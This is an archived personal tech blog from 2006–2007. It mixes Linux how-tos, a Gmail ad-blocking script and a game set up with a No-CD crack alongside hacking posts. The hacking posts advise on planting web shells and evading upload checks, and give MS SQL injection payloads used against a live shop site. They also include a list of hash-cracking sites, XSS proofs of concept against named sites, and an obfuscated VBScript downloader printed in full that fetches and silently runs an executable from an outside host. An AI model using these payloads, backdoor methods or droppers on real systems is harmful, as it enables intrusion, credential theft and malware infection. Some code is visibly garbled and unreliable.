Thursday, September 13, 2007

Annoying gmail advertisements & links

Gmail has been part of my life for the past few years, and I recently found its sponsored links particularly annoying. Surely most Gmail users have had the same thought; well, some might think it is helpful... but I don't! I decided to remove it; there is no default option in Gmail that allows you to disable it. Examining its generated HTML code, the entire ad is in the rh section within a big div, so you can force your browser to remove it with Greasemonkey or Stylish in Firefox...
GMAIL code:


....


// Gmail ad Removal user script
// 2007-09-13
//
// ==UserScript==
// @name gmail ad removal
// @namespace http://insistkool.blogspot.com
// @description remove gmail ad
// @include http://mail.google.com/*
// ==/UserScript==

// Fetch the div list once instead of on every iteration and comparison.
var divs = document.getElementsByTagName("div");
for (var i = 0; i < divs.length; i++) {
    if (divs[i].className == "rh") {
        divs[i].style.visibility = "hidden";
        divs[i].style.display = "none";
    }
}

Or, in a much cleaner way, with CSS within Stylish:

@-moz-document domain(mail.google.com) {

.rh {display: none !important;}
}

Using a Greasemonkey user script is undoubtedly much slower, since it has to loop through all divs... maybe there is a better way to locate a div by its class name, but I don't know... anyway, it does the job, who cares.. lol

Sunday, July 29, 2007

Turn on syntax highlight in vim

This really annoys me! Every time I use vim, I have to turn on syntax highlighting and line numbering etc. manually. And I can't find .vimrc in my home directory, only .viminfo is there. Here is how to get it solved:

Create a .vimrc in your $HOME directory:
vim ~/.vimrc
then put in all the settings:
syntax on
set number
set wrapmargin=1
set background=dark   " or light, depending on your terminal
...
Now syntax highlighting and numbering are on, yo....

Friday, July 20, 2007

"Automate Installation of Web Server in openSUSE 10.2 (installs Apache, MySQL, and PHP) - bash script"

A nice script written by Scott Morris, good for the lazy/newbie. Full details at http://www.suseblog.com/?p=240

http://www.suseblog.com/install-lamp-stack.sh.tar.bz2 (tar -jxvf install-lamp-stack.sh.tar.bz2)

#!/bin/sh
# Bash script to install a lamp stack on an opensuse 10.2 system.

printf "################################################################################\n"
printf "INSTALL SCRIPT FOR APACHE, MYSQL, AND PHP ON openSUSE 10.2\n"
printf "by Scott Morris (2007-06-21)\n"
printf "http://www.suseblog.com/\n\n"
printf "################################################################################\n"

# Make sure we are root.
if [ "$EUID" != "0" ]; then
echo "You must have root privileges to run this script!"
exit 1
fi

printf "\n################################################################################\n"
printf "Installing Apache, MySQL, and PHP...\n"
printf "################################################################################\n"

yast -i apache2-mod_php5 php5 php5-bz2 php5-gd php5-iconv php5-mbstring php5-mcrypt php5-mysql php5-snmp php5-zlib mysql mysql-client mysql-devel mysql-shared perl-DBD-mysql apache2 apache2-mod_perl apache2-prefork libapr-util1 libapr1 php5-pdo

printf "\n################################################################################\n"
printf "Starting Apache and MySQL...\n"
printf "################################################################################\n"

/etc/init.d/apache2 start
/etc/init.d/mysql start

printf "\n################################################################################\n"
printf "Adding Apache and MySQL to boot sequence...\n"
printf "################################################################################\n"

chkconfig -a apache2
chkconfig -a mysql

printf "\n################################################################################\n"
printf "Status of Apache and MySQL...\n"
printf "################################################################################\n"

/etc/init.d/apache2 status
/etc/init.d/mysql status

printf "\n################################################################################\n"
printf "You must now run the following command to initialize your MySQL root password:\n"
printf "/usr/bin/mysqladmin -u root password 'new-password'\n"
printf "/usr/bin/mysqladmin -u root -h `hostname`.`dnsdomainname` password 'new-password'\n"
printf "Note that unless you've set it up to be different, your web root is here:\n"
printf "/srv/www/htdocs\n"
printf "################################################################################\n"

Tuesday, July 03, 2007

Football manager 2007 on opensuse

I started to love FM2007, but it took me two days to figure out how to play it on top of my openSUSE 10.2. If you are in the same trouble, hopefully this helps you:

First of all, FM2007 doesn't provide a Linux version, so I just grabbed a Windows binary (assume it is fm.iso).
To emulate a Windows binary, wine does the job very well; I use rug to install wine.

rpm --import http://software.opensuse.org/openSUSE-Build-Service.asc
rug sa http://software.opensuse.org/download/Emulators:/Wine/SLE-10/ "Wine Repository"
rug sub "Wine Repository"
rug install wine

Now that you have wine installed successfully, it is time to mount the iso:
mkdir /mnt/fm
mount -o loop -t iso9660 fm.iso /mnt/fm
cd /mnt/fm
You also need a JRE to run the game:
wine jre-1_5_0_09-windows-i586-p-s.exe
Then,
wine Setup\ FM2007\PC.exe -console
When you finish all these steps, you need to replace the original exe file with the No-CD version. For most gamers, executing
wine fm.exe
will start the game, but my particular monitor supports up to 800x600 @60, so if you have a similar monitor, you have to set the Desktop size to 1024x768 and check all the "Windows settings" in the "Graphics" tab. Now you're all set, happy gaming.

Web shell? - why, how and where

Some folks asked me what else to do when you have a shell. Well, it certainly depends on your shell privilege and the specific target setup and configuration; there is no perfect universal way, only the best possible way.

Ok, there are simply too many things you can do, and I will just list one I used a lot. My personal preference is to put a web shell on the target, so what is a web shell? Some people call it a web backdoor; it mainly provides a set of functions to manipulate the target. Why do I prefer a web shell rather than a trojan or other backdoors? Several reasons back me up: 1st) most of your targets are web-based (how many companies today don't have a website?); 2nd) most of these sites are on shared hosts, and chances are these low-cost hosts usually don't give out a shell; they do the whole thing pretty much via some hot GUI application, such as ispconfig, phpmyadmin, and some built-in forum and blogging applications like phpbb etc.; 3rd) it is relatively hard to detect; a traditional virus, worm or trojan will be caught very easily when the anti-virus signatures are up to date. Well, you might argue that web IDS/IPS have been developed and anti-virus vendors have started to include these web shells in their signatures; that is absolutely correct. But the point is they are not yet mature and very few companies are using them.

Then how do you upload a web shell? Again, it relies on the specific target; for blog, forum and CMS-like applications, it is very likely that you can by the following techniques:

  • change file extension - this probably won't work for the majority applications
  • obfuscation/encryption/encoding - simply to escape the application security check, be aware the after shell can still be interpreted.
  • injection - using "echo" to echo the content of your shell or some build-in sql functions to generate a new file, make sure to trim shell size, web server usually has length restriction (most likely 256)
There are a lot of other ways, such as injecting script into an acceptable file (such as gif, jpeg etc.); I am not gonna list them here (unless I am writing my book, hehe). Here are two good lists of popular web shells; the trade-off of popularity certainly means a higher chance of being detected and killed.

http://michaeldaw.org/projects/web-backdoor-compilation/
http://www.unsec.net/2007/03/web_backdoor_jspshell_aspshell_1.html

Make sure you pick the right one or your effort will be dismissed. If you are not sure how to find out the target web server name and version, come back in a few days to check out my basic web server fingerprinting tutorial; I will be showing you how to get this info.

Monday, July 02, 2007

MS SQL injection review

A long time ago, I posted a little review about MySQL injection; now it is time to do a self review/reminder about MS SQL injection... lol, old school technique... It is, but I was a little surprised that my brother found a website susceptible to MS SQL injection, and I had almost forgotten how to do this manually. This target is built with traditional ASP, with a classic vulnerable script named product.asp.

Of course we need to detect the existence with sql injection, stick a ' returns a '80040e14' error. There you go, then enumerate table name, product.asp?ProductID=" having 1=1--

returns column name p.Product_Name, then execute product,asp?ProductID=" Group by p.Product_Name having 1=1--, table enumeration can be finished pretty quick, of course a little script can automate the whole process. Just do a regex to match the column name. Right here, we can testify with union all

http://www.site.com/productdet.asp?ProductID=1%20UNION%20ALL%20SELECT%201,1,2,3,4,5,6,7,8,9%20FROM%20sysobjects

It works fine. Surprisingly, this website also has cmd_shell opened; at this point, the whole game becomes not worthwhile to continue. Plus, the site also enables RDP and remote registry, so there are tons of ways to get in. I guess I should just stop here....

Javascript alert in PHP

How do you put JavaScript in PHP code? A friend of mine who is taking a web course asked me; well, this is indeed a basic question. But his instructor "forces" him to use the alert method to output the session value, so it took quite a while to figure out how to do this.

Basically his assignment is to echo the number of visitors using a session and alert the value. Here is how:

<?php
session_start();
// start the counter at 0 on the first visit instead of reading an unset key
$_SESSION['visitors'] = (isset($_SESSION['visitors']) ? $_SESSION['visitors'] : 0) + 1;

if (isset($_SESSION['visitors'])) {
    // PHP emits the script tag; the browser runs the alert. Cast to int so
    // nothing but a number ever lands inside the JavaScript string.
    echo "<script type=\"text/javascript\">alert('Visitors: " . (int) $_SESSION['visitors'] . "');</script>";
}
?>
Feels too basic? Yup, it is... But it does annoy beginners for a few days, esp. when his/her head prefers this evil JavaScript...

Wednesday, May 09, 2007

Online reverse lookup sites

Ripped from kuza55's blog; I thought this may come in handy.


" http://kuza55.blogspot.com/2006/10/online-reverse-lookup-tables-for.html

md5:
http://www.tmto.org/ (formerly md5lookup.com)
http://md5.rednoize.com (good with words)
http://nz.md5.crysm.net (English dictionary, nearly all one to four character alphanumeric. 27.8m records.) - seems to be down atm
http://us.md5.crysm.net (British, Jargon and American worldlist, IP addresses 16.0m records)
http://www.xmd5.org (good with numbers)
http://gdataonline.com (wordlist based, I think)
http://www.hashchecker.com (It seems to say its good, but I've never gotten many hits form here)
http://passcracking.ru
http://www.milw0rm.com/md5
http://plain-text.info (this one is quite good and generally returns results, but you have to submit things to be cracked, its not just an online database)
http://www.securitystats.com/tools/hashcrack.php (does various, including LM NTLM and SHA-1, but seems to return no results on anything than the most basic, so rather useless)
http://www.schwett.com/md5/ - Does Norwegian words too
http://passcrack.spb.ru/
http://shm.pl/md5/
http://www.und0it.com/
http://www.neeao.com/md5/
http://md5.benramsey.com/
http://www.md5decrypt.com/
http://md5.khrone.pl/
http://www.csthis.com/md5/index.php
http://www.md5decrypter.com/
http://www.md5encryption.com/
http://www.md5database.net/
http://md5.xpzone.de/
http://md5.geeks.li/
http://www.hashreverse.com/
http://www.cmd5.com/english.aspx
http://www.md5.altervista.org/
http://md5.overclock.ch/biz/index.php?p=md5crack&l=en
http://alimamed.pp.ru/md5/ (for those who can't read russian: put your md5 in the second box)
http://md5crack.it-helpnet.de/index.php?op=add (German, I have no idea....)
http://cijfer.hua.fi/ (Projects->md5 reverse lookup)
http://shm.hard-core.pl/md5/
http://www.mmkey.com/md5/HOME.ASP
http://www.thepanicroom.org/index.php?view=cracker
http://rainbowtables.net/services/results.php (I'm not sure i'd trust this site to give more than a tiny amount of results)
http://rainbowcrack.com/ (requires people to contribute rainbowtables to be able to query them, and continue contributing them constantly)
http://www.securitydb.org/cracker/
http://passwordsecuritycenter.com/index.php?main_page=product_info&cPath=3&products_id=7 (This is meant to be used as proof that they can actually reverse passwords to convince you to buy their stuff, but as long as they decrypt it it doesn't matter why, right?)
http://0ptix.co.nr/md5
https://www.astalavista.net/?cmd=rainbowtables
http://ice.breaker.free.fr/
http://www.md5this.com
http://www.pldsecurity.de/forum/md5.php
http://www.xeons.net/genesis/
http://hackerscity.free.fr/
http://bisix.cogia.net/
http://md5.allfact.info/
http://bokehman.com/cracker/
http://www.tydal.nu/article/md5-crack/
http://ivdb.org/search/md5/
http://md5.netsons.org/
http://md5.c.la/ (The form at the bottom left of the page)
http://www.jock-security.com/md5_database/?page=crack
http://c4p-sl0ck.dyndns.org/cracker.php
http://www.blackfiresecurity.com/tools/md5lib.php (Queries the MD5 Library AIM Bot)
http://www.md5-db.com/index.php

lm Only:
http://lasecwww.epfl.ch/~oechslin/projects/ophcrack/ (Currently Offline)
http://www.milw0rm.com/lm (Currently Offline)

lm + ntlm:
http://plain-text.info
http://www.securitystats.com/tools/hashcrack.php
http://rainbowtables.net/services/results.php
http://rainbowcrack.com/
http://passwordsecuritycenter.com/index.php?main_page=product_info&cPath=3&products_id=7
https://www.astalavista.net/?cmd=rainbowtables

md4:
http://www.securitystats.com/tools/hashcrack.php
http://rainbowtables.net/services/results.php
http://rainbowcrack.com/

sha1:
http://passcrack.spb.ru/
http://www.hashreverse.com/
http://rainbowcrack.com/
http://www.md5encryption.com/
http://www.shalookup.com/
http://md5.rednoize.com/
http://c4p-sl0ck.dyndns.org/cracker.php
http://www.tmto.org/

"

Saturday, May 05, 2007

Malware sites

I was poking around the net and found some interesting malware sites:

Please don't try any of them unless you know what you are doing

http://jokeonlineworld.com/gift.html
< meta equiv="Refresh" content="0; URL=http://jokeonlineworld.com/gift.exe">


http://jokeonlineworld.com/
< meta equiv="Refresh" content="0; URL=http://jokeonlineworld.com/install.exe">


http://sequestro.t35.com/
"http://www.blogger.com/exigencias.exe" Leia atentamente todas as exigencias. (Portuguese: "Read all the requirements carefully.")

And another type, which uses VBScript:
http://www.youshini.com/jp/789.htm
on error resume next
Dim haotian
Set y = Nothing
ppp="obj"
ppp1="ect"
ppp2=ppp&ppp1
Set data = document.createElement(ppp2,"")
data.setAttribute ("classid"), ("clsid:BD96C556-65A3-11D0-983A-00C04FC29E36")
bbs ="Micro"
bbs0 ="delm"
bbs1 ="soft.XMLHTTP"
bbs2 =bbs&bbs1
result = Null And Null
Set x = data.CreateObject(bbs2,"")
set mm = data.createobject("Adodb.Stream","")
mm.type = 1
mm.open
url = "http://www.453787.com/jp/photo1.exe"
ysha="GET"
x.Open ysha, url, False
x.Send
exe="haotian.bat"
bbp1 ="Scrip"
bbp2 ="ting.FileSystem"
bbp3 ="Object"
bbp =bbp1&bbp2&bbp3
mm.write x.responseBody
set F = data.createobject(bbp,"")
Set T = Nothing
set tmp = F.GetSpecialFolder(2)
exe= F.BuildPath(tmp,exe)
mm.savetofile exe,2
mm.close
set Bb = data.createobject("Shell.Application","")
Bb.ShellExecute exe,"","","open",0


A little more Googling led me to this
http://malware.hiperlinks.com.br/cgi/submit-agressive?action=list&type=agressive
which holds tons of malware sites, most of them using the above two techniques, via embedding inside a script, flash, or simply posting the link.

Certainly most of these malwares are coded in different ways and have various features, such as keylogging, reverse connect, spawning a port, sending credentials over email or to IRC etc. I'm not surprised they use script to force the victim to download their babies, but using < meta equiv="Refresh" content="0; URL=http://url"> is indeed pretty cool, coz it will be executed even if you disable JavaScript in the browser. I guess if it is possible to change exe to some other common mime type that a browser will download automatically, such as gif, swf etc., it will make the whole game more serious and horrible.

However, it is so funny to see how they work, and it is easy to steal what the attackers had collected, since most cracked stuff is stored in plain text.
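A small detector for the meta-refresh trick discussed above, written here as an added example for this post (it is not code from the blog or from any of the sites it lists): it splits a saved HTML page into tags so that the "< meta" spacing, mixed case and attribute order seen on those pages don't hide the redirect, then reports any refresh target that ends in an executable extension. The sample page, the reserved host name and the extension list are constructed for the demo; it assumes only POSIX sh and awk.

```shell
#!/bin/sh
# Added example (not from the blog or the listed sites): flag saved HTML pages
# whose meta refresh points straight at an executable.
# Assumes POSIX sh and awk; the sample page and host below are constructed.

# find_refresh_to_exe FILE -> prints each refresh target ending in an
# executable extension, one per line; returns 0 if any was found, else 1.
find_refresh_to_exe() {
    [ -f "$1" ] || { echo "no such file: $1" >&2; return 1; }
    awk '
    BEGIN { RS = "<"; found = 0 }   # one record per tag: handles "< meta" and tags spanning lines
    {
        tag = tolower($0)           # META, Refresh, URL= all show up in the wild
        sub(/^[ \t\r\n]+/, "", tag) # drop the space the blog inserted after "<"
        if (tag !~ /^meta/) next
        if (tag !~ /refresh/) next
        # pull the target out of content="0; url=..." (stop at quote, >, space or ;)
        if (match(tag, /url=[^"> ;]+/)) {
            target = substr(tag, RSTART + 4, RLENGTH - 4)
            if (target ~ /\.(exe|scr|bat|com|pif)$/) { print target; found = 1 }
        }
    }
    END { if (!found) exit 1 }' "$1"
}

# Constructed sample: same shape as the pages in the post, but a reserved host name.
sample=$(mktemp)
cat > "$sample" <<'EOF'
<html><head><title>gift</title>
< META http-equiv="Refresh" CONTENT="0; URL=http://malware.example.invalid/gift.exe">
<meta http-equiv="refresh" content="5; url=http://www.example.invalid/index.html">
</head><body>Loading...</body></html>
EOF
if find_refresh_to_exe "$sample"; then
    echo "ALERT: page redirects straight to an executable"
fi
rm -f "$sample"
```

Run it over a directory of fetched pages with a loop and you have a crude but JavaScript-independent check for exactly the kind of page the post describes; the second meta tag in the sample shows that an ordinary refresh to an HTML page is left alone.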

Thursday, May 03, 2007

"Interview with Rain Forest Puppy" - From www.ush.it

If you don't know who RFP is, you are still a dumb boy.
"Interview with Rain Forest Puppy"
http://www.ush.it/2007/05/01/interview-with-rain-forest-puppy/

Saturday, April 21, 2007

How to build a great markup

So you are a web master, a web designer, or a novice who is starting web design? If you've ever stumbled across your web site full of gibberish that was actually meant to be Japanese, Greek, Swahili etc., you've probably forgotten to set the encoding. Search engines such as Google and Ask will sort results differently based on the language of a search request, so proper encoding pays off if you want search engine traffic.

The tutorials below explain what happens behind the scenes and provide very good solutions; definitely great tutorials!

Developing With Web Standards
http://www.456bereastreet.com/lab/developing_with_web_standards/

Fix Your Site With the Right DOCTYPE!
http://www.alistapart.com/articles/doctype

Sunday, February 18, 2007

XSS on abc

Oops, found XSS on the ABC search engine
http://app.abc.go.com/keyword/searchResults?search=%3Cscript%3Ealert%28%22xss%22%29%3C%2Fscript%3E&searchType=0

XSS is elsewhere!

Thursday, February 01, 2007

OWASP LiveCD

The OWASP Live CD is out! It is based on Morphix and runs completely in memory. It ships with the following tools and docs:
Tools: WebGoat v4, WebScarab, Paros, JBroFuZZ, Cal9000, Nmap, TcpDump, WireShark

Docs: OWASP Guide 2.0, OWASP Testing Guide

The CD is 802MB and still a beta version, which does not include any specialty tools such as VOIP, RFID, and Wireless. Thus, the pentest directory is almost empty. My first feeling is: lame and unprofessional. Well, maybe that is why it is still in beta, I hope. If you compare it to other hot pentesting live CDs, such as BackTrack, I really can't see the point of releasing this CD, except that they include all the OWASP guides. In addition, file permissions are not set properly, and lots of useless stuff is included. I really don't see the point of releasing this CD; I love their guides and a few applications, but I highly recommend you not waste time on this crap; grabbing your desired documentation and applications would definitely be a better choice. Anyway, it is beta; I hope I could see a decent release next time.

Wednesday, January 03, 2007

Google blacklist database

I got pointed to a couple of interesting posts on the mailing list about the Google blacklist database:

http://sb.google.com/safebrowsing/update?version=goog-black-url:1:1
http://sb.google.com/safebrowsing/update?version=goog-black-url:1:7998
http://sb.google.com/safebrowsing/update?version=goog-white-domain:1:19,goog-white-url:1:371,goog-black-url:1:7693,goog-black-enchash:1:15282
http://sb.google.com/safebrowsing/update?version=goog-black-url:1:7753
http://sb.google.com/safebrowsing/update?versio=goog-black-url:1:0000

Obviously Google uses this data for "safebrowsing", and it is interesting that Google even logs credentials and some other sensitive info. I picked some blacklisted URLs randomly, and they are really phishy. It is good for security folks to figure out how phishers set up fake sites, and also great for vendors to compile these lists to enhance their products' anti-phishing.

Oops...PDF, keep an eye on it!

From pdp
"You must understand that the attacker doesn’t need to have write access to the specified PDF document. In order to get an XSS vector working you need to have a PDF file hosted on the target and that’s all about it. The rest is just a matter of your abilities and desires.

This finding was originally mentioned by Sven Vetsch, on his blog. The attack vector was discovered by Stefano Di Paola and Giorgio Fedon. This is a very good and quite interesting finding. Good work."

A PoC:
http://some.random.site.com/foo.pdf#something=javascript:alert(123);

A couple of variants:
1. Universal CSRF / session riding;
(Mozilla Firefox, Internet Explorer, Opera + Acrobat Reader plugin)

2. UXSS in #FDF, #XML and #XFDF;
(Mozilla Firefox + Acrobat Reader plugin)

3. Possible Remote Code Execution;
(Mozilla Firefox + Acrobat Reader plugin)

4. Denial of Service;
(Internet Explorer + Acrobat Reader plugin)

Details @ http://www.wisec.it/vulns.php?page=9

Very interesting and dangerous bug; don't simply click PDFs from now on. If you really need to download a PDF, keep an eye on the URL and strip extra parameters if there are any. Dangerous, Dangerous, Dangerous! The web is getting really crazy, sigh

Thursday, December 28, 2006

Not much

I've become interested in sniffing recently, having so much fun hacking my machines around; I am pretty impressed with ettercap's capabilities, it gives pretty good results when combined with other tools. I will write up a detailed tutorial on this topic.

Also I learned some new OS fingerprinting techniques when I reviewed the nmap, xprobe and ettercap fingerprinting code. I should come up with some new discoveries as time goes on... hopefully!

Wednesday, December 27, 2006

Get your dsniff working on Slackware

Surely everyone has heard of dsniff, an evil set of 31337 network tools. I finally grabbed a copy and wanna give it a try, but the traditional ./configure && make && make install didn't get it to work. A couple of hours of googling turned up a patch made by Sined; someone claimed it works, but it didn't work on my slack box.. well, maybe it is for another distro or I have something missing (I guess I don't). I got no clue what changes he made, nor was I able to google a solution that works for me. So I figured out this simple dirty way; hope this helps folks who are facing the same problems.

www.packetfactory.net is down at the moment; I grabbed a copy from http://www.enzotech.net/dsniff.html (Don't use the ones on sf - outdated)
libnids-1.16-fixed-FC.tar.gz
libnet-1.0.2a-fixed-FC.tar.gz

After installing libnet and libnids,

insistkool@foo:~/dsniff$ ./configure
insistkool@foo:~/dsniff$ make
This produces a bunch of compilation errors:

----------------------------------------------------------------------------
./sshcrypto.c:25: error: field `key' has incomplete type
./sshcrypto.c:30: error: syntax error before "des_key_schedule"
./sshcrypto.c:30: warning: no semicolon at end of struct or union
./sshcrypto.c:31: warning: data definition has no type or storage class
./sshcrypto.c:32: error: syntax error before '}' token
./sshcrypto.c: In function `blowfish_encrypt':
./sshcrypto.c:131: error: `BF_ENCRYPT' undeclared (first use in this function)
./sshcrypto.c:131: error: (Each undeclared identifier is reported only once
./sshcrypto.c:131: error: for each function it appears in.)
./sshcrypto.c: In function `blowfish_decrypt':
./sshcrypto.c:143: error: `BF_DECRYPT' undeclared (first use in this function)
./sshcrypto.c: In function `des3_init':
./sshcrypto.c:153: error: dereferencing pointer to incomplete type
./sshcrypto.c:156: error: dereferencing pointer to incomplete type
./sshcrypto.c:157: error: dereferencing pointer to incomplete type
./sshcrypto.c:160: error: dereferencing pointer to incomplete type
./sshcrypto.c:162: error: dereferencing pointer to incomplete type
./sshcrypto.c:164: error: dereferencing pointer to incomplete type
./sshcrypto.c:165: error: dereferencing pointer to incomplete type
./sshcrypto.c:166: error: dereferencing pointer to incomplete type
./sshcrypto.c: In function `des3_encrypt':
./sshcrypto.c:176: error: dereferencing pointer to incomplete type
./sshcrypto.c:176: error: dereferencing pointer to incomplete type
./sshcrypto.c:178: error: dereferencing pointer to incomplete type
./sshcrypto.c:178: error: dereferencing pointer to incomplete type
./sshcrypto.c:178: error: `DES_ENCRYPT' undeclared (first use in this function)
./sshcrypto.c:179: error: dereferencing pointer to incomplete type
./sshcrypto.c:179: error: dereferencing pointer to incomplete type
./sshcrypto.c:179: error: `DES_DECRYPT' undeclared (first use in this function)
./sshcrypto.c:180: error: dereferencing pointer to incomplete type
./sshcrypto.c:180: error: dereferencing pointer to incomplete type
./sshcrypto.c: In function `des3_decrypt':
./sshcrypto.c:189: error: dereferencing pointer to incomplete type
./sshcrypto.c:189: error: dereferencing pointer to incomplete type
./sshcrypto.c:191: error: dereferencing pointer to incomplete type
./sshcrypto.c:191: error: dereferencing pointer to incomplete type
./sshcrypto.c:191: error: `DES_DECRYPT' undeclared (first use in this function)
./sshcrypto.c:192: error: dereferencing pointer to incomplete type
./sshcrypto.c:192: error: dereferencing pointer to incomplete type
./sshcrypto.c:192: error: `DES_ENCRYPT' undeclared (first use in this function)
./sshcrypto.c:193: error: dereferencing pointer to incomplete type
./sshcrypto.c:193: error: dereferencing pointer to incomplete type
make: *** [sshcrypto.o] Error 1

----------------------------------------------------------------------------

You can see the errors are mainly caused by the failure to locate several definitions (des_key_schedule, DES_ENCRYPT, DES_DECRYPT etc.). Be aware dsniff heavily relies on libnet, libnids and openssl (and a few more).

insistkool@foo:~/dsniff$ cp sshcrypto.c sshcrypto.c.orig
insistkool@foo:~/dsniff$ vi sshcrypto.c
remove the space when you edit your file
15 #include <>
16 #include <>
17
18 #include <>
19 #include <>
20 #include
21
22 #include "sshcrypto.h"

So, we can tell the compiler where these headers are located:

15 #include <>
16 #include <>
17 #include <>
18 #include <>
19 #include <>
20 #include <>


All right, now simply:
insistkool@foo:~/dsniff-2.3$ make
insistkool@foo:~/dsniff-2.3$ su -c 'make install'

Well, even though I am on Slackware, I think it will work just fine on other distributions. Lesson of the day - Don't google before reading through the error messages and getting my hands dirty!

Saturday, December 16, 2006

How to install Slackware 11.0 in VMWare 5.5 on Windows XP?

Slackware 11 is out! All Slackware users must be glad to see this long-awaited version (Yes, I am a slacker ^^)

To feel the new Slackware, I decided to install it in VMware on my laptop.

My setup:
Compaq Laptop Presario v4400
VMWare WorkStation 5.5 build-29772
Slackware 11.0

For those who are curious about its new features and changes, please review the official change log at http://www.slackware.com/announce/changes11.0.php


First we grab a copy of the Slackware ISO (FTP, HTTP, BitTorrent).
The new Slackware contains 6 CDs:
CD 1 base packages
CD 2 KDE
CD 3 KDEI (you need this if you are not an English speaker)
CD 4-6 Source code

Choose the appropriate CD according to your needs. I downloaded the first 2 CDs with BitTorrent since I don't need the GUI language pack or the source code. If you are new to Slackware, please go through the tutorials provided below.

p.s.: Always verify the md5sum, some ISO
A Windows-based md5sum can be found at http://www.md5summer.org/download.html
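Both this step and the LAMP install script earlier in the archive (a tarball fetched over plain HTTP and then run as root) call for the same check, so here is one added example that serves both; it is not from the blog, from Slackware or from Scott Morris's script. It is a POSIX sh function that compares a file against a published md5 or sha256 sum and a wrapper that only extracts an archive when the sum matches. It assumes md5sum and sha256sum from coreutils; the sample file and its sum in the demo are constructed.

```shell
#!/bin/sh
# Added example (not from the blog or either project it links to): verify a
# downloaded file against a published checksum before extracting or running it.
# Assumes md5sum/sha256sum from coreutils; everything else is POSIX sh.

# verify_checksum FILE ALGO EXPECTED -> 0 on match, 1 on mismatch or error.
# ALGO is md5 (what the Slackware mirrors publish) or sha256.
verify_checksum() {
    file=$1; algo=$2; expected=$3
    [ -f "$file" ] || { echo "no such file: $file" >&2; return 1; }
    case "$algo" in
        md5)    actual=$(md5sum "$file" | cut -d' ' -f1) ;;
        sha256) actual=$(sha256sum "$file" | cut -d' ' -f1) ;;
        *)      echo "unsupported algorithm: $algo" >&2; return 1 ;;
    esac
    # Published sums are sometimes upper-case; compare in one case.
    expected=$(printf '%s' "$expected" | tr 'A-Z' 'a-z')
    if [ "$actual" = "$expected" ]; then
        echo "OK: $file matches the published $algo sum"
        return 0
    fi
    echo "MISMATCH: $file $algo is $actual, expected $expected" >&2
    return 1
}

# verified_extract ARCHIVE ALGO EXPECTED -> extracts the .tar.bz2 only after
# the checksum checks out; a mismatch leaves the archive untouched.
verified_extract() {
    verify_checksum "$1" "$2" "$3" || return 1
    tar -jxvf "$1"
}

# Demo with a constructed file; the "good" sum is computed on the spot, the
# all-zero sum stands in for a published value that does not match.
demo_dir=$(mktemp -d)
printf 'hello\n' > "$demo_dir/sample.txt"
good=$(sha256sum "$demo_dir/sample.txt" | cut -d' ' -f1)
verify_checksum "$demo_dir/sample.txt" sha256 "$good"
verify_checksum "$demo_dir/sample.txt" sha256 \
    0000000000000000000000000000000000000000000000000000000000000000 \
    || echo "refused: not extracting or running an unverified file"
rm -rf "$demo_dir"
```

The expected sum has to come from somewhere other than the download itself (the mirror's CHECKSUMS file or the project's announcement), otherwise a tampered mirror simply publishes a matching sum alongside the tampered file.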

Fire up VMWare, create a new "Virtual Machine" -> Typical -> Linux -> Other Linux 2.4.x kernel (Slackware 11 uses 2.4.33.3) -> Save to wherever you like -> NAT (or bridged if you like; I chose NAT in this case)

One trick here is that VMWare uses SCSI by default, which needs a couple more steps during installation. Thus, I changed it to IDE by removing and re-adding the disk in the "Edit virtual machine settings" section. Now, you need to tell VMWare to use "Physical drive" and certainly insert CD 1. At this point, you are done with the VMWare setup; time for installation.

First of all, change the boot sequence to boot from CD-ROM, press "Enter" all the way, and type in "root".
Now, you need to partition your hard drive; we use cfdisk /dev/hda because it is simpler than fdisk.


You need to design your partition, here is my partition table (8 G):

512 Mb root partition (primary partition)
The root filesystem, contains system software and libraries, configuration data (/etc), local state data (/var) and all other filesystems are mounted under it.

Extended partition utilizing the rest of the disk
We then create logical drives on the extended partition.

512 Mb swap partition (logical drive)
Note that you probably don't need a swap partition that large but I like the extra insurance and I have plenty of space. It allows me to work on absolutely huge files, and provides extra memory addressing in the event of some sort of race condition. 256 Mb should probably be enough swap though, if disk space is tight.

4 Gb partition for /usr (logical drive)
Most all of your software and libraries get installed in /usr. It is useful to have a large partition for this.

1.5 Gb partition for /opt (logical drive)
"Optional" software can be installed here. For example, KDE will be installed to /opt/kde. I install some other software to /opt as well.

2 Gb (roughly) for /home (logical drive)
We use what is leftover, for /home. This is where the user directories are, and where users will store personal files. You may also install some software to /home if desired. I do, and I keep build directories there as well.

You might be interested in the following articles from Slackware FAQ:
How should I partition my hard disk?
How much swap space should I use?

Just follow the instructions, make your partitions.

You will be prompted after you "write" the partitions; now "setup" your machine.
root@slackware:/#setup

Scroll down to "ADDSWAP", you should see something like the below image after "SWAP SPACE DETECTED".

Choose /dev/hda1 as / (the root partition; follow the table above) and format the file system as "reiserfs". For the rest of the partitions, perform the same procedure and eventually we see

You should be prompted to "select Slackware Installation source"; CD is our choice. Then you need to pick your desired packages


After choosing your desired packages, we simply perform a full installation. (You can always remove unwanted packages later)

You will be asked to "Install Linux Kernel". Again, we choose CD.


Be aware that all the options you set here can be modified later, so don't worry if you make any mistake.
Now we are at the stage of "Enable Hotplug/VDEV" (this typically loads /etc/rc.d/rc.hotplug); we choose "No" and choose "simple" for LILO. The rest is pretty straightforward; I am sure anyone can figure it out on his/her own. In the remaining installation stages, you will be asked to configure video resolution, LILO destination (MBR typically), mouse configuration, GPM, network configuration,

startup services, default window manager for X (Note: GNOME is not available any more due to being "hard to maintain", but you can download DropLineGNOME from http://droplinegnome.org/ if you insist on GNOME) and root password set up.

Now you are all set. Simply "reboot", and you will see the lovely login prompt.

Now it is highly recommended to add a new, less privileged user (adduser / useradd).
Also run `alsaconf` to enable sound card detection, and `startx` to start the GUI.

And I think I should mention the Slackware package management tools for those who are not familiar with Slackware.

(You need "root" to run the following commands)
pkgtool - menu-based package tool
installpkg - install a new package
removepkg - remove a package
upgradepkg - upgrade a package
syntax: upgradepkg oldpkg%newpkg

For other package commands (explodepkg etc.), please review the Slackware handbook.
Installed package information is stored at /var/log/packages

Tons of packages can be found at http://www.linuxpackages.net/
Official Slackware packages: http://packages.slackware.it/

"few" great slackware tutorial and tips can be found here (Yes, I said "few")
Excellent "free" Slackware book
http://www.slackbook.org/#book

Nice brief overview of slackware 11
http://linuxhelp.blogspot.com/2006/10/brief-look-at-slackware-110.html

Lots of useful links, articles and tips
http://www.userlocal.com/tips/tips.php

Slackware tips & tricks by Jack S.La
http://members.cox.net/laitcg/new/

Slackware Bible
http://www.slackersbible.org/?q=node/115


Final word:
